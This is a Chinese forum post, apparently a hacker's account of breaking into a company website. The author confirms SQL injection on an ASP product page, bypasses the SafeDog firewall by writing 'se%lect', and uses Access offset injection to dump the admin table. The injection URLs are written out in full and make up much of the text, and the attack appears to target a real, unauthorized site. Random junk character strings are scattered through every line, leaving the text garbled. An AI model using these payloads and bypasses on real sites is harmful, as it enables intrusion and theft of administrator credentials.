打开网站,一个企业站。) I0 V! g3 O+ q7 F! A
' j) l0 t0 q5 y# Q$ V1 A6 j/ l( V7 Y+ S4 ]& m& \
顺手加个admin
6 D0 z: ^2 ]: a) ~" k* E* S! _
" u4 A" q# X' k" X# _$ h3 S# t( b( `- A
默认后台。
9 X+ |( e8 c4 P C7 Z# W( Y2 G回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。+ p& `( Y! E4 s3 }; O) v5 h' p
8 a# i! m& H! V7 F3 K! k' I
% v2 N. f, R, [8 O' ]% H) S/ D* d
3 f- c) L9 Z% a" p, Y( X `+ h所以就不用御剑扫了,待会直接封IP。
, v0 `) s, ^/ u6 p
, L+ j! \7 G; G用order by语句判断是否存在注入。* g8 w9 N( x& r2 Z+ H. L
http://www.xxx.com /product_show.asp?id=997 order by 1- \5 V4 Z/ ?7 S0 O2 x
http://www.xxx.com /product_show.asp?id=997 order by 100
, `5 ^1 F0 t* H现在存在注入,经测试后发现是9个字段。- z$ |! K X5 j* k# g% E) j5 {0 t
' V0 H/ Y7 N4 w+ u, ]; [
接下来进行联合查询,猜是否存在admin表。9 ^# J; r$ U5 I5 L" ^$ ?' q
http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
- Q/ K2 p6 s$ T- D3 a( X) b, h8 c! ~# O' j/ O' ]
x0 s/ j+ A- Y6 M
3 I8 ?: v. c9 L( D$ V3 k' t2 e+ ^. p7 f在select中间加个%,se%lect绕过安全狗。5 p5 a7 K7 ^' t1 a
' k) c8 C" a1 i) K; \$ M0 u) ^
7 ?% P* _% c. d$ C
发现存在admin表,然后开始手工猜常用的字段。( N+ H, u/ ^) y* X4 T4 o7 [+ i5 F
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
4 V* ]3 H' Y: R% P* f5 Y0 C $ p6 b' ]5 @: X! k( ~6 X' N" z1 x
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
8 ?0 Y2 c0 \# @) r( W" O H
: |! C3 P/ }7 J% |: G. M科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。# N5 E0 V( L5 u8 d& ~2 l7 w9 L a
http://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin& U1 R$ ~& R7 M3 U! K
好了,敏感内容出显了。" `! f' H p( q* x7 J
# R2 p H) }- m1 {# k9 ~
- {% b' }; Q: T* N8 S9 Q- p; P
# @4 @" H* R, X# q# o- j! }& @ |